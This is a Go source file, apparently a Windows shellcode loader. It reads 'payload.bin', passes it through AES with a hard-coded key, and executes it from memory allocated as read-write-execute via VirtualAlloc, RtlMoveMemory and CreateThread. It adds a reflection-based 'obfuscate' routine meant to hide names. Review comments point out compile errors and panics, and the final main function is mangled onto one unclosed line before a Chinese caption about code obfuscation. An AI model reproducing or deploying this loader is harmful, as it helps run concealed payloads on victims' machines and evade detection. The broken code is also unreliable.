package main

import ( "crypto/aes" "crypto/cipher" "encoding/base64" "io/ioutil" "reflect" "strconv" "syscall" "time" "unsafe" )

// Win32 VirtualAlloc flags (winnt.h values) used by exec and fakePE.
const (
	MEM_COMMIT             = 0x1000 // back the reservation with pages
	MEM_RESERVE            = 0x2000 // reserve the address range
	PAGE_EXECUTE_READWRITE = 0x40   // RWX protection: writable and executable at the same time
)

// Lazily-resolved Win32 entry points used by exec and fakePE. NewLazyDLL/NewProc load and
// resolve nothing until the first Call, so a missing export only surfaces at that point, and
// the callers below discard the returned error anyway. syscall.NewLazyDLL exists only on
// Windows, so this file builds for that platform only.
var (
	kernel32      = syscall.NewLazyDLL("kernel32.dll")
	ntdll         = syscall.NewLazyDLL("ntdll.dll")
	VirtualAlloc  = kernel32.NewProc("VirtualAlloc")  // allocate the RWX region
	RtlMoveMemory = ntdll.NewProc("RtlMoveMemory")    // copy bytes into it
	CreateThread  = kernel32.NewProc("CreateThread")  // start a thread at that address
)

// Indirection slots, assigned in init; main calls func4 instead of exec directly.
// Each signature mirrors the function init stores in it.
var func0 CipherFunc
var func1 func(cipher CipherFunc, key []byte, src []byte) []byte
var func2 func(src string) string
var func3 func(src string) []byte
var func4 func(charcode []byte)
var func5 func(filename string) []byte
var func6 func()

// Data tables populated in init: var0 is the AES key used by Encode/Decode; var1–var4 and var6
// are name lists read by obfuscate; var5 holds the payload file name read by main.
var var0 []byte
var var1 [][]byte
var var2 []string
var var3 []string
var var4 []string
var var5 []string
var var6 []string

// init wires the func0…func6 slots to the real implementations and fills the data tables
// that obfuscate and main read. It runs before main as part of normal package initialisation.
func init() {
	func0 = AesCipher
	func1 = Crypt
	func2 = Encode
	func3 = Decode
	func4 = exec
	func5 = readFile
	func6 = fakePE

	// AES key for Encode/Decode: 24 bytes, i.e. AES-192, embedded verbatim in the binary.
	// Note that 077 on the first row is an octal literal (decimal 63 = 0x3F), unlike its
	// 0x-prefixed neighbours.
	var0 = []byte{
		0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B,
		0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B,
		0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B,
	}

	// Local-variable names of each function, one row per entry of var2.
	// NOTE(review): the element type is [][]byte but the rows contain string literals; an
	// untyped string constant is not assignable to []byte, so this literal does not compile
	// as written.
	var1 = [][]byte{
		{"AesKey", "key", "src", "block", "iv", "stream", "dst"},
		{"cipher", "key", "src"},
		{"src", "payloadBytes", "encodedBytes", "bdata"},
		{"src", "decodedBytes", "payloadBytes"},
		{"charcode", "addr", "handle"},
		{"filename", "data"},
		{"payload", "encodedPayload", "shellCodeHex"},
	}

	// Original function names, in the same order as the func0…func6 slots.
	var2 = []string{"AesCipher", "Crypt", "Encode", "Decode", "exec", "readFile", "fakePE"}

	// Names of the indirection slots.
	var3 = []string{"func0", "func1", "func2", "func3", "func4", "func5", "func6"}

	// Names of the data tables.
	var4 = []string{"var0", "var1", "var2", "var3", "var4", "var5", "var6"}

	// Input file main reads, relative to the working directory.
	var5 = []string{"payload.bin"}

	// Entry-point name.
	var6 = []string{"main"}

}

// obfuscate is intended to rename the functions listed in var2 to "func<i>" and to re-point
// the data tables named in var4, all through reflection.
//
// NOTE(review): as written it cannot do that. reflect.Value.FieldByName panics when the
// value's Kind is not Struct; &func0 dereferences to a Func value and &var0 to a Slice, so
// the first iteration of each loop panics. Go also has no runtime symbol renaming: the
// names in var2/var3/var4 are plain strings with no link to the declared identifiers. The
// second loop additionally declares i without using it, which is a compile error.
func obfuscate() {
	for i, name := range var2 {
		newName := "func" + strconv.Itoa(i)
		// Panics: the Elem() of *CipherFunc is a Func, not a Struct.
		reflect.ValueOf(&func0).Elem().FieldByName(name).Set(reflect.ValueOf(newName))
	}

	// Nested else chain is a first-match lookup over var0…var6 for a field called name.
	for i, name := range var4 {
		variable := reflect.ValueOf(&var0).Elem().FieldByName(name)
		if variable.IsValid() {
			variable.Set(reflect.ValueOf(var0))
		} else {
			variable = reflect.ValueOf(&var1).Elem().FieldByName(name)
			if variable.IsValid() {
				variable.Set(reflect.ValueOf(var1))
			} else {
				variable = reflect.ValueOf(&var2).Elem().FieldByName(name)
				if variable.IsValid() {
					variable.Set(reflect.ValueOf(var2))
				} else {
					variable = reflect.ValueOf(&var3).Elem().FieldByName(name)
					if variable.IsValid() {
						variable.Set(reflect.ValueOf(var3))
					} else {
						variable = reflect.ValueOf(&var4).Elem().FieldByName(name)
						if variable.IsValid() {
							variable.Set(reflect.ValueOf(var4))
						} else {
							variable = reflect.ValueOf(&var5).Elem().FieldByName(name)
							if variable.IsValid() {
								variable.Set(reflect.ValueOf(var5))
							} else {
								variable = reflect.ValueOf(&var6).Elem().FieldByName(name)
								if variable.IsValid() {
									variable.Set(reflect.ValueOf(var6))
								}
							}
						}
					}
				}
			}
		}
	}

}

// AesCipher XORs src with an AES-CTR keystream derived from key and an all-zero IV, so the
// same call both encrypts and decrypts. key must be 16, 24 or 32 bytes.
//
// The NewCipher error is dropped: an invalid key length leaves the block nil and the CTR
// constructor below panics. A fixed zero IV means every call under the same key reuses the
// identical keystream; that is what makes the round trip work, but two different messages
// encrypted with one key leak their XOR.
func AesCipher(key []byte, src []byte) []byte {
	blk, _ := aes.NewCipher(key)
	var nonce [aes.BlockSize]byte
	stream := cipher.NewCTR(blk, nonce[:])
	out := make([]byte, len(src))
	stream.XORKeyStream(out, src)
	return out
}

// CipherFunc is the shape of a symmetric transform: it takes a key and input bytes and
// returns the transformed bytes.
type CipherFunc func(key []byte, src []byte) []byte

// Crypt applies cipher to src under key. It is pure delegation, kept as the single point
// through which Encode and Decode reach the cipher implementation.
func Crypt(cipher CipherFunc, key []byte, src []byte) []byte {
	transformed := cipher(key, src)
	return transformed
}

// Encode encrypts src with AesCipher under the package key var0 and returns the result as
// standard base64. Because AesCipher uses a fixed IV, equal inputs always produce equal output.
func Encode(src string) string {
	ciphertext := Crypt(AesCipher, var0, []byte(src))
	return base64.StdEncoding.EncodeToString(ciphertext)
}

// Decode reverses Encode: base64-decodes src and runs it through AesCipher under var0.
//
// The base64 error is discarded. On malformed input DecodeString returns the bytes decoded
// before the error (possibly none), and those are decrypted as if they were complete, so
// callers cannot tell a truncated or corrupted payload from a valid one.
func Decode(src string) []byte {
	raw, _ := base64.StdEncoding.DecodeString(src)
	return Crypt(AesCipher, var0, raw)
}

// exec maps charcode into a fresh RWX region, copies it there and runs it on a new thread,
// blocking until that thread exits. Every Win32 return value and error is discarded.
//
// Defender notes: the VirtualAlloc(PAGE_EXECUTE_READWRITE) → RtlMoveMemory → CreateThread
// sequence, with a thread start address in memory not backed by any image, is the classic
// in-process loader pattern that EDR/ETW threat-intelligence telemetry and memory scanners
// report on.
func exec(charcode []byte) {
	// Failure is not checked: a failed allocation leaves addr == 0 and the copy below still runs.
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	// time.Sleep takes a Duration in nanoseconds, so 5 is effectively no pause.
	time.Sleep(5)
	// &charcode[0] panics with index out of range when charcode is empty.
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
	time.Sleep(5)
	handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0)
	time.Sleep(5)
	// Waits forever for the new thread; the handle is never closed.
	syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE)
}

// readFile returns the whole contents of filename. The read error is dropped, so a file
// that cannot be opened yields nil and the caller sees an empty slice rather than a failure.
// (ioutil.ReadFile is deprecated in favour of os.ReadFile but behaves the same.)
func readFile(filename string) []byte {
	var contents []byte
	contents, _ = ioutil.ReadFile(filename)
	return contents
}

// fakePE prefixes a placeholder byte string with the "MZ" and "PE\0\0" magic values and then
// performs the same VirtualAlloc(RWX) → RtlMoveMemory → CreateThread → WaitForSingleObject
// sequence as exec. The header is only the two magics, not a parsable DOS/PE image, and the
// "payload" is the ASCII text "malicious code" rather than machine code, so this demonstrates
// the loader pattern rather than running anything; its detection surface is the same as exec's.
func fakePE() {
	header := []byte{
		// DOS Header
		0x4D, 0x5A, // 'MZ'
		0x90, 0x00, // Stub program

		// PE Header
		0x50, 0x45, 0x00, 0x00, // 'PE\0\0'
		// ...
	}

	charcode := []byte("malicious code")

	data := append(header, charcode...)

	// All Win32 results and errors are discarded, as in exec.
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(data)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	// Duration is in nanoseconds: 5 is effectively no pause.
	time.Sleep(5)
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&data[0])), uintptr(len(data)))
	time.Sleep(5)

	handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0)
	time.Sleep(5)
	// Blocks until the new thread ends; the handle is never closed.
	syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE)

}

func main() { obfuscate() payload := string(readFile(var5[0])) encodedPayload := Encode(payload) shellCodeHex := Decode(encodedPayload) func4(shellCodeHex)

Go代码混淆:将多个代码段整合为可运行代码

